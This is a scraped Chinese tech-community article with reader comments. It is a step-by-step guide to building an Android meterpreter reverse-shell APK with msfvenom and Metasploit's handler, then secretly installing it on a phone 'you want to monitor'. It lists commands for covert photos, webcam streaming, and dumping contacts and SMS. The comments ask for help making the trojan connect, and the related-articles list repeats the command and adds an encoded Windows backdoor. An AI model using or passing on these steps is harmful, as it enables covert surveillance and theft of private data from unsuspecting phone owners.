Loading [MathJax]/jax/output/CommonHTML/config.js

开发者社区

文档建议反馈控制台

文章/答案/技术大牛

发布

社区首页 >专栏 >使用Kali生成木马入侵安卓手机

使用Kali生成木马入侵安卓手机

知识与交流

发布于 2023-03-25 03:20:23

发布于 2023-03-25 03:20:23

7.4K5

举报

文章被收录于专栏：黑客技术家园黑客技术家园

先看Kali的ip，我的是192.168.0.101

然后输入命令：msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk

这里的5555是设置的端口,也可以自己更改,显示这个说明已经生成成功只有9K多大小

然后输入命令：msfconsole来启动msfconsole，启动过程需要等待一会儿。

1.use exploit/multi/handler //加载模块

2. set payload android/meterpreter/reverse_tcp //选择Payload

3.show options //查看参数设置

这里需要设置LHOST的ip地址，也就是你的kali的ip地址

还有LPORT端口，刚才设置的为5555，也需要更改一下（刚才直接设置为4444也是可以的）

1.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 //这里的端口设置成刚才我们生成木马所监听的端口

3.exploit //开始执行漏洞开始监听,等待手机上线

接下来就要发挥你的聪明才智将这个apk装在你想监控的手机上了

红色框出的地方就说明手机上线了然后可以输入sysinfo 查看手机信息

开启摄像头之后，然后会生成两个文件，双击就可以打开了

webcam_list 查看手机有多少个摄像头这里显示是2个

webcam_stream //开启摄像头

webcam_snap //隐秘拍照功能

dump_contacts //导出电话号码

dump_sms //导出信息

可以输入?查看更多命令

本文参与腾讯云自媒体同步曝光计划，分享自微信公众号。

原始发表：2019-02-09，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自黑客技术家园微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

评论

登录后参与评论

5 条评论

热度

最新

2023-08-29

手机安装了，监听没显示上线，什么鬼

手机安装了，监听没显示上线，什么鬼

回复回复1举报

2023-03-27

博主你好，我想问一下植入病毒之后，为什么操作几次次之后，他会自动断开。还有明明已经给了摄像头的授权，但是在开启相机的时候，网页无法访问，拍照也不能成功，这个是因为安卓版本的问题，还是其他原因呢？还有设备号在这次入侵中起到了什么作业呢？

博主你好，我想问一下植入病毒之后，为什么操作几次次之后，他会自动断开。还有明明已经给了摄像头的授权，但是在开启相机的时候，网页无法访问，拍照也不能成功，这个是因为安卓版本的问题，还是其他原因呢？还有设备号在这次入侵中起到了什么作业呢？

111举报

用户10730571回复用户10457379

2023-08-29

我为啥都没显示上线啊，哥

我为啥都没显示上线啊，哥

回复回复点赞举报

2024-03-02

apk版本过低，高安卓版本用不了

apk版本过低，高安卓版本用不了

回复回复点赞举报

2023-09-01

小米13U 运行不了马的客户端，失败

小米13U 运行不了马的客户端，失败

回复回复点赞举报

编辑精选文章

换一批

万字详解高可用架构设计

Go 开发者必备：Protocol Buffers 入门指南

10分钟带你彻底搞懂分布式链路跟踪

多租户的 4 种常用方案

亿级月活的社交 APP，陌陌如何做到 3 分钟定位故障？

60页PPT全解：DeepSeek系列论文技术要点整理

kali Linux外网渗透控制Android安卓手机系统。

手机系统 android linux 连接

就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->

知识与交流

2024/03/11

1.6K0

kali Linux外网渗透控制Android安卓手机系统。

Kali之安卓木马

tcp/ip https linux 网络安全 android

Kali linux的安卓木马一般只能在内网操作，要想在监控互联网的安卓手机，必须要使用内网穿透，工具有很多，我使用的是NATAPP。思路如下：

知识与交流

2021/04/02

2.8K0

美少妇与Android的故事

android 网络安全安全 tcp/ip

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.74.129 LPORT=4444 R > /root/桌面/shell.apk

菜菜有点菜

2022/03/17

7190

Kali利用Android木马渗透手机（高级篇）

网络安全 android dns 云镜（主机安全）tcp/ip

选择网关 add to target 1 选择目标 add to target 2

院长技术

2021/02/19

18.4K0

Kali利用Android木马渗透手机（高级篇）

Metasploit渗透Android

进入https://natapp.cn/ 注册并创建tcp隧道复制authtoken 下载客户端

tea9

2022/09/08

6560

msf之木马程序

网络安全 tcp/ip windows

这里使用的是Kali linux虚拟机攻击机ip是192.168.0.108 靶机ip是192.168.177.134

宸寰客

2020/09/18

2K0

利用termux安装msf渗透手机

html 网络安全 android tcp/ip

首先Termux，你可以把它当做是一个Android终端模拟器和Linux环境应用程序，安装可直接使用，无需root或设置。自动安装最小基本系统 – 使用APT包管理器可以使用其他软件包。

网e渗透安全部

2020/07/07

13.5K2

msfvenom生成后台木马监听目标（windows渗透测试）

网络安全 windows apache android

操作过程概况：利用msf生成一个后台木马，使用exploit/multi/handler模块，通过对方打开的形式获取权限，可以进入后渗透对目标进行监听等操作。

用户9282069

2021/12/13

3K0

如何通过命令入侵安卓手机

tcp/ip 安全 android

首先，我用的靶机是魅蓝2，对其网络使用静态ip：xxx.xxx.xxx.aaa，“x”是需要对应入侵机的ip，“a”则是没用过的0-255随便输

知识与交流

2021/04/02

3.4K0

从 “ 短信劫持马 ” 来谈APP安全

shell android 网络安全 tcp/ip 腾讯云测试服务

这种短信劫持木马的概念和新闻我想大家都应该接触过了，就不怎么说概念了，具体的可以搜一搜新闻，一抓一大把。

网e渗透安全部

2019/11/20

1.4K0

网络安全之KALI渗透手机、获取目标的精确位置

2：在终端输入msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 来生成木马程序

全栈程序员站长

2021/06/09

3.1K0

网络安全之KALI渗透手机、获取目标的精确位置

如何攻击同一局域网的其他设备

网络安全安全 tcp/ip

2、在 Kali 终端输入以下命令在 Kali 虚拟机/root路径下生成远控文件520.apk：

知识与交流

2021/04/02

6.9K0

网络安全之KALI使用

2：在终端输入msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk 来生成程序

互联网-小阿宇

2022/11/21

1.3K0

工具的使用 | Metasploit Framework(MSF)的使用

安全漏洞 windows 网络安全安全 shell

Metasploit Framework(MSF)是一款开源安全漏洞检测工具，附带数千个已知的软件漏洞，并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程，被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的，但是再后来的新版中，改成了用Ruby语言编写的了。在kali中，自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点，讲解MSF框架的使用。

谢公子

2022/01/13

2.5K0

工具的使用 | Metasploit Framework(MSF)的使用

kali下androidshell那些事

android https 网络安全

在 kali中我们可以利用 msfvenom来生成一个Android木马。命令如下：

逍遥子大表哥

2021/12/17

5720

kali下androidshell那些事

MSF恶意程序利用【实战】

渗透测试手机网络系统软件

作为一名渗透测试者，我们可以击败安全防御机制，但这是仅仅是我们工作的一部分。当你进行渗透攻击时，请记住如下的忠告：

用户10781703

2024/08/19

1450

通过Metasploit生成各种后门

生成windows后门 1.首先生成后门 [root@localhost ~]# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 lhost=192.168.1.1 lport=6666 -f exe > ./lyshark.exe 2.进入Metasploit，执行以下操作 3.将我们的(lyshark.exe)拷贝到目标主机并运行 4.攻陷后常用查询命令 ps　　　　　　　　 #查看进程 migrate 　

王瑞MVP

2022/12/28

6500

如何使用Kali生成木马入侵安卓手机

tcp/ip 安全网络安全 android 打包

版本阶段构建一个简单的工具来生成后门和简单的工具来张贴攻击攻击，如浏览器攻击，DLL。该工具使用流行的有效负载编译恶意软件，然后编译后的恶意软件可以在windows，android，mac上执行。使用此工具创建的恶意软件也有能力绕过大多数AV软件保护。TheFatRat安装好后如下图所示

知识与交流

2021/04/02

6.8K1

如何使用Kali生成木马入侵安卓手机

黑客玩具入门——4、漏洞扫描与Metasploit

黑客服务漏洞入门系统

Legion是Sparta的一个分支，它是一个开源的、易于使用的、超级可扩展的、半自动的网络渗透测试框架。它是一款Kali Linux系统默认集成的Python GUI应用程序工具。Legion是一个Nmap、Nikto、Hydra等工具的集合，利用各个工具的优秀功能，完成收集信息、扫描和爆破等任务。

zaking

2023/12/01

2.7K0

黑客玩具入门——4、漏洞扫描与Metasploit

1.1 Metasploit 工具简介

Metasploit 简称（MSF）是一款流行的开源渗透测试框架，由Rapid7公司开发，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，并管理专家驱动的安全性进行评估，提供真正的安全风险情报。并且该框架还提供了一系列攻击模块和Payload工具，可用于漏洞利用、及漏洞攻击。同时软件自身支持多种操作系统平台，包括Windows、Linux、MacOS等。直到今天Metasploit已成为众多黑客手中渗透攻击的利器，并在安全领域大展身手。

王瑞MVP

2023/06/30

5460

1.1 Metasploit 工具简介

相关推荐

kali Linux外网渗透控制Android安卓手机系统。

更多 >